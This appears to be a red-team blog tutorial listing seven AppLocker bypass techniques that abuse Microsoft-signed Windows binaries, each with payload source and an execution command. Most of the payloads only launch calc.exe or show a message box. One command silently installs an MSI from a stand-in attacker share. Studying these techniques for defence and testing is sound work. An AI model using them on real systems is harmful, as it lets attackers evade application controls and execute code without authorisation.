Evading Windows Security: A List of AppLocker Bypass Techniques with LOLBAS

🔐 Introduction

In the previous article, we demonstrated how to bypass AppLocker using PowerShell and in-memory .NET assembly loading. That example showed how a single trusted binary can be leveraged to execute payloads without touching disk.

This follow-up expands on that concept by listing several AppLocker bypass techniques using LOLBAS (Living Off the Land Binaries and Scripts). These are legitimate Microsoft-signed binaries that are often allowed by default and can be abused to execute arbitrary code. So this article w’ll be less detailed and more practical.

🎯 Learning Objectives

• Configure AppLocker in a lab environment
• Explore practical bypass techniques using LOLBAS

❓ LOLBAS

LOLBAS (Living Off the Land Binaries and Scripts) are legitimate executables, scripts, or libraries that are built into Windows and signed by Microsoft. Because they are trusted and required for normal system operations, they are often whitelisted by security controls like AppLocker. Attackers and red teamers can abuse these binaries to execute arbitrary code, download payloads, or bypass application whitelisting. The list of LOLBAS can be found here: LOLBAS Project. https://lolbas-project.github.io/

🛠️ Configuring AppLocker

To reproduce bypass scenarios in a lab:

1. Run secpol.msc → Application Control Policies → AppLocker
2. Create rules for .exe, .dll, .ps1
3. Set mode to Enforce or Audit Only

⚔️ AppLocker Bypass Techniques with LOLBAS

This a list of well known bypass techniques

🧹 1. InstallUtil.exe — Execute DLLs Without Main()

InstallUtil can execute installer classes embedded in a DLL, bypassing the need for a traditional Main() method.

Payload Code:

using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Configuration.Install;

[RunInstaller(true)]
public class Payload : Installer {
  public override void Uninstall(System.Collections.IDictionary savedState) {
    Process.Start("calc.exe");
  }
}

Execution:

csc.exe /target:library /out:payload.dll Payload.cs
InstallUtil.exe /logfile= /ShowCallStack payload.dll

• ✅ Bypasses AppLocker if InstallUtil is allowed
• 📌 Common in environments with .NET tools installed

🛠️ 2. msbuild.exe — Compile and Run Inline C# from XML

MSBuild can compile and execute inline C# code embedded in a project file using CodeTaskFactory.

Payload XML:

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build">
    <CodeTaskFactory AssemblyFile="C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" TaskName="Code">
      <Task>
        <Code Type="Class" Language="cs">
          <![CDATA[
            using Microsoft.Build.Framework;
            using Microsoft.Build.Utilities;
            public class Code : Task {
              public override bool Execute() {
                System.Diagnostics.Process.Start("calc.exe");
                return true;
              }
            }
          ]]>
        </Code>
      </Task>
    </CodeTaskFactory>
  </Target>
</Project>

Execution:

msbuild.exe payload.csproj

• ✅ Bypasses AppLocker if MSBuild is allowed
• 📌 Often overlooked in developer workstations

☠️ 3. wmic.exe — WMI-Based Process Execution

WMIC can spawn processes using WMI calls, often trusted in legacy environments.

Execution:

wmic process call create "cmd.exe /c calc.exe"

• ✅ Bypasses AppLocker if WMIC is allowed
• 📌 Deprecated in newer Windows versions but still present

🖼️ 4. mshta.exe — Execute VBScript or JavaScript

MSHTA can run embedded scripts via HTML or direct command-line input.

Execution:

mshta.exe "vbscript:Execute(\"CreateObject(\"\"WScript.Shell\"\").Run \"\"calc.exe\"\":close\")"

• ✅ Bypasses AppLocker if MSHTA is allowed
• 📌 Common in phishing and initial access payloads

📦 5. msiexec.exe — Run Malicious MSI Installers

MSI files can contain embedded scripts or binaries. msiexec.exe can execute them silently.

Execution:

msiexec.exe /quiet /i \\attacker\share\payload.msi

• ✅ Bypasses AppLocker if MSI execution is allowed
• 📌 Useful for lateral movement and persistence

🧬 6. rundll32.exe — Execute Exported DLL Functions

rundll32.exe can invoke exported functions from DLLs, including custom payloads.

Execution:

rundll32 testdll.dll,run

DLL Code Example:

#include "stdafx.h"
#include <Windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    return TRUE;
}

extern "C" __declspec(dllexport) void run() {
    MessageBoxA(NULL, "Execution happened", "Bypass", MB_OK);
}

• ✅ Bypasses AppLocker if DLL path is trusted
• 📌 Can be combined with DLL sideloading techniques

🧪 7. Microsoft.Workflow.Compiler.exe — Workflow Abuse

This binary can compile and execute workflow activities from a text file.

C# Payload in text.txt:

using System;
using System.Workflow.ComponentModel;
public class Run : Activity {
    public Run() {
        Console.WriteLine("I executed!");
    }
}

PowerShell Loader:

$workflowexe = "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
$workflowasm = [Reflection.Assembly]::LoadFrom($workflowexe)
$SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static')
Add-Type -Path 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Workflow.ComponentModel.dll'
$compilerparam = New-Object Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
$compilerparam.GenerateInMemory = $True
$pathvar = "text.txt"
$output = "C:\Tools\run.xml"
$tmp = $SerializeInputToWrapper.Invoke($null, @($compilerparam, [String[]] @(,$pathvar)))
Move-Item $tmp $output

Execution:

C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe run.xml results.xml

• ✅ Bypasses AppLocker if Workflow Compiler is allowed
• 📌 Rarely monitored binary with powerful capabilities

Conclusion

AppLocker is a powerful security feature, but as shown, it can be bypassed through the abuse of trusted Microsoft-signed binaries — the so‑called LOLBAS. these tools can all be leveraged to execute arbitrary code while remaining under the radar of traditional application whitelisting.

Stay tuned for the next article.

All the examples can be found on my github repos : https://github.com/R3dLevy/TheOffensiveDevelopmentProject

📚 References

• Ultimate AppLocker Bypass List – GitHub
  A comprehensive repository documenting verified and unverified AppLocker bypass techniques, including DLL execution, PowerShell abuse, and LOLBas strategies.

• CybersecTools – AppLocker Bypass Techniques
  Categorized methods for bypassing AppLocker, including PowerShell modules and legacy binary abuse.

• Living Off The Land Binaries,Script and Libraries
  The official list of LOLBAS.